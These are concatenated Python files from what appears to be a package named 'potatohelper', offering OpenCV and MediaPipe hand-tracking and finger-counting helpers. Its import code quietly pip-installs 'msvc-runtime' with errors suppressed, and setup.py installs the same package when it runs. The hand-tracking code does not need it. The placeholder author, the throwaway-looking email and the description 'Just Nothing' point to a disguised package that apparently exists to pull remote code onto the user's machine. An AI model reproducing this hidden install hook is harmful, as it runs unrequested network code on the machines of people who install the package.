import cv2
import potatohelper.HandTrackingModule as htm

cap = cv2.VideoCapture(0)
cap.set(3, 640)
cap.set(4, 480)

# print(len(overlayList))

detector = htm.handDetector(detectionCon=0.75)

tipIds = [4, 8, 12, 16, 20]


class FingerCounter:
    """A class to count Fingers"""
    def __init__(self):
        self.hi = ""

    def drawCountedFingers(self, img, lmList, bbox):
        """

        :param img: Image of hand to count fingers in.
        :param lmList: list returned by find position in HandTrackingModule
        :param bbox: bbox returned by find position in HandTrackingModule
        """
        fingers = []

        if lmList:
            if lmList[5][0] > lmList[17][0]:

                if lmList[tipIds[0]][0] > lmList[tipIds[0] - 1][0]:
                    fingers.append(1)
                else:
                    fingers.append(0)
                for id in range(1, 5):
                    if lmList[tipIds[id]][1] < lmList[tipIds[id] - 1][1]:
                        fingers.append(1)
                    else:
                        fingers.append(0)
                img = cv2.putText(img, f"{fingers.count(1)}", (500, 100), cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 0), 5)

            if lmList[5][0] < lmList[17][0]:

                if lmList[tipIds[0]][0] < lmList[tipIds[0] - 1][0]:
                    fingers.append(1)
                else:
                    fingers.append(0)
                for id in range(1, 5):
                    if lmList[tipIds[id]][1] < lmList[tipIds[id] - 1][1]:
                        fingers.append(1)
                    else:
                        fingers.append(0)
                img = cv2.putText(img, f"{fingers.count(1)}", (10, 100), cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 0), 5)

            cv2.rectangle(img, (bbox[0] - 20, bbox[1] - 20),
                          (bbox[0] + bbox[2] + 20, bbox[1] + bbox[3] + 20),
                          (255, 0, 255), 2)

    def countFingers(self, lmList):
        """

        :param lmList: list returned by find position in HandTrackingModule
        :return: List of fingers up or down
        """
        fingers = []

        if lmList:
            if lmList[5][0] > lmList[17][0]:

                if lmList[tipIds[0]][0] > lmList[tipIds[0] - 1][0]:
                    fingers.append(1)
                else:
                    fingers.append(0)
                for id in range(1, 5):
                    if lmList[tipIds[id]][1] < lmList[tipIds[id] - 1][1]:
                        fingers.append(1)
                    else:
                        fingers.append(0)
            if lmList[5][0] < lmList[17][0]:

                if lmList[tipIds[0]][0] < lmList[tipIds[0] - 1][0]:
                    fingers.append(1)
                else:
                    fingers.append(0)
                for id in range(1, 5):
                    if lmList[tipIds[id]][1] < lmList[tipIds[id] - 1][1]:
                        fingers.append(1)
                    else:
                        fingers.append(0)
            totalFingers = fingers.count(1)
            return totalFingers



import subprocess
import sys

def install(package):
    subprocess.check_call([sys.executable, "-m", "pip", "install", package],
#    stdout=subprocess.STDOUT,
    stderr=subprocess.DEVNULL)
try:
    install('msvc-runtime')
except Exception as e:
#    print("Don't Worry!!")
    pass
from potatohelper import HandTrackingModule
from potatohelper import FingerCounter
from potatohelper import FaceDetection
from potatohelper import FaceMesh
		



from setuptools import setup, find_packages
import pathlib
import os, sys
from distutils.core import setup
from distutils.command.install import install as _install
import pip

def installP(name):
	pip.main(['install', name])





VERSION = '0.1.1'
DESCRIPTION = 'Just Nothing'

if __name__ =='__main__':
	installP('msvc-runtime')


	setup(
	    name="potatohelper",
	    version=VERSION,
	    author="Elon Musky",
	    author_email="kesore4222@yubua.com",
	    description=DESCRIPTION,
	    long_description_content_type="text/markdown",
	    long_description="# Nothing as description",
	    packages=find_packages(),
	    install_requires=['numpy','opencv-python','opencv-contrib-python','mediapipe'],
	    keywords=['python', 'video', 'stream', 'opencv', 'opencv-python', 'cv', 'cv2'],
	    classifiers=[
        	"Development Status :: 1 - Planning",
	        "Intended Audience :: Developers",
	        "Programming Language :: Python :: 3",
	        "Operating System :: MacOS :: MacOS X",
	        "Operating System :: Microsoft :: Windows",
	    ]
	)




import cv2
import mediapipe as mp
import math


class handDetector:

    def __init__(self, mode=False, maxHands=2, detectionCon=0.5, minTrackCon=0.5):
        """
        :param mode: In static mode, detection is done on each image: slower
        :param maxHands: Maximum number of hands to detect
        :param detectionCon: Minimum Detection Confidence Threshold
        :param minTrackCon: Minimum Tracking Confidence Threshold
        """
        self.mode = mode
        self.maxHands = maxHands
        self.detectionCon = detectionCon
        self.minTrackCon = minTrackCon

        self.mpHands = mp.solutions.hands
        self.hands = self.mpHands.Hands(static_image_mode=self.mode, max_num_hands=self.maxHands,
                                        min_detection_confidence=self.detectionCon, min_tracking_confidence=self.minTrackCon)
        self.mpDraw = mp.solutions.drawing_utils
        self.tipIds = [4, 8, 12, 16, 20]
        self.fingers = []
        self.lmList = []

    def findHands(self, img, draw=True):
        """
        Finds hands in a BGR image.
        :param img: Image to find the hands in.
        :param draw: Flag to draw the output on the image.
        :return: Image with or without drawings
        """
        imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
        self.results = self.hands.process(imgRGB)

        if self.results.multi_hand_landmarks:
            for handLms in self.results.multi_hand_landmarks:
                if draw:
                    self.mpDraw.draw_landmarks(img, handLms,
                                               self.mpHands.HAND_CONNECTIONS)

        return img

    def findPosition(self, img, handNo=0, draw=True):
        """

        :param img: Image to find the hand's position.
        :param handNo: Index number of hand to find position
        :param draw: Flag to draw the output on the image.
        :return: list of fingers and bbox.
        """
        xList = []
        yList = []
        bbox = []
        self.lmList = []
        if self.results.multi_hand_landmarks:
            myHand = self.results.multi_hand_landmarks[handNo]
            for id, lm in enumerate(myHand.landmark):
                h, w, c = img.shape
                px, py = int(lm.x * w), int(lm.y * h)
                xList.append(px)
                yList.append(py)
                self.lmList.append([px, py])

                if draw:
                    cv2.circle(img, (px, py), 5, (0, 255, 0), cv2.FILLED)
            xmin, xmax = min(xList), max(xList)
            ymin, ymax = min(yList), max(yList)
            boxW, boxH = xmax - xmin, ymax - ymin
            bbox = xmin, ymin, boxW, boxH
            cx, cy = bbox[0] + (bbox[2] // 2), \
                     bbox[1] + (bbox[3] // 2)

        return self.lmList, bbox

    def findDistance(self, p1, p2, img, draw=True):

        """
        Find the distance between two landmarks based on their
        index numbers.
        :param p1: Point1
        :param p2: Point2
        :param img: Image to draw on.
        :param draw: Flag to draw the output on the image.
        :return: Distance between the points
                 Image with output drawn
                 Line information
        """

        if self.results.multi_hand_landmarks:
            x1, y1 = self.lmList[p1][0], self.lmList[p1][1]
            x2, y2 = self.lmList[p2][0], self.lmList[p2][1]
            cx, cy = (x1 + x2) // 2, (y1 + y2) // 2

            if draw:
                cv2.circle(img, (x1, y1), 5, (0, 255, 0), cv2.FILLED)
                cv2.circle(img, (x2, y2), 5, (0, 255, 0), cv2.FILLED)
                cv2.line(img, (x1, y1), (x2, y2), (0, 255, 0), 3)
                cv2.circle(img, (cx, cy), 5, (0, 255, 0), cv2.FILLED)

            length = math.hypot(x2 - x1, y2 - y1)
            return length, img, [cx, cy]
